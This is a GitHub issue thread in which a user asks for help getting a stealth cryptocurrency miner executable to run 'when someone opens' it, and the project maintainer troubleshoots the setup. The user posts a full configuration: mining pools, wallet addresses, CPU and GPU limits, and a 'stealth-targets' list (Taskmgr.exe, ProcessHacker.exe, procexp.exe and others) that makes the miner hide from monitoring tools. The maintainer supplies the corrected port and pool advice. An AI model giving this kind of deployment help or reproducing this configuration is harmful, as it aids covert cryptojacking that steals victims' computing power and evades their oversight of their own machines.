### ISSUE TITLE
Miner starting 

### ISSUE THREAD

**Issue by striker40** [UnamSanctam/SilentCryptoMiner#416]
So when someone opens the .exe i have created will it automatically start mining or i must do something else

**Comment by UnamSanctam** [comment]
Yes it will start mining automatically when started. You can run the checker to see if the miners are running and what settings they were started with.

**Comment by striker40** [comment]
Watchdog Running: No
Miners:
GPUs:
 NVIDIA GeForce GTX 1660
Compatible GPU found: True

i get this when i run the checker but when i go to the pool and search up my address nothing is showing up

**Comment by striker40** [comment]
any help pls

**Comment by UnamSanctam** [comment]
Means that the miner isn't running, have you started the miner? If you have and it isn't showing up then most likely some connection settings are wrong, in that case post them here.

**Comment by striker40** [comment]
by starting the miner u mean running the exe right ?

**Comment by UnamSanctam** [comment]
Yes exactly.

**Comment by striker40** [comment]
"algo": "rx/0",
    "pool": "pool.minexmr.com",
    "port": 4444,
    "wallet": "4A6X6LeatWYid8sBNM1ZTWPK7RETymSmXdqAoKQYg197PjNqUUeFAXrdnU43JS1MWTHwAFnPSZPksdt7ExU4mKg8FqyYVUd",
    "password": "",
    "nicehash": false,
    "ssltls": false,
    "max-cpu": 50,
    "idle-wait": 5,
    "idle-cpu": 80,
    "stealth-targets": "",
    "kill-targets": ""
    
     "url": "stratum://`0x57015BD94f0aCE5a381DaB5cd9Bb8da12C81729b`.doylos@eu1.ethermine.org",
    "algo": "ethash",
    "max-gpu": 60,
    "idle-wait": 5,
    "idle-gpu": 100,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": ""

i think thats it

**Comment by UnamSanctam** [comment]
Don't use MineXMR and you forgot the port for the ETH miner.

**Comment by striker40** [comment]
can you maybe send me the settings and just change the wallet or is that too much to ask ?

**Comment by UnamSanctam** [comment]
All of your settings are correct except that you should add a port to the ETH miners pool URL (port 4444 for non-SSL, so eu1.ethermine.org:4444) and that you should use another pool than MineXMR.

**Comment by striker40** [comment]
oh ok thanks a lot
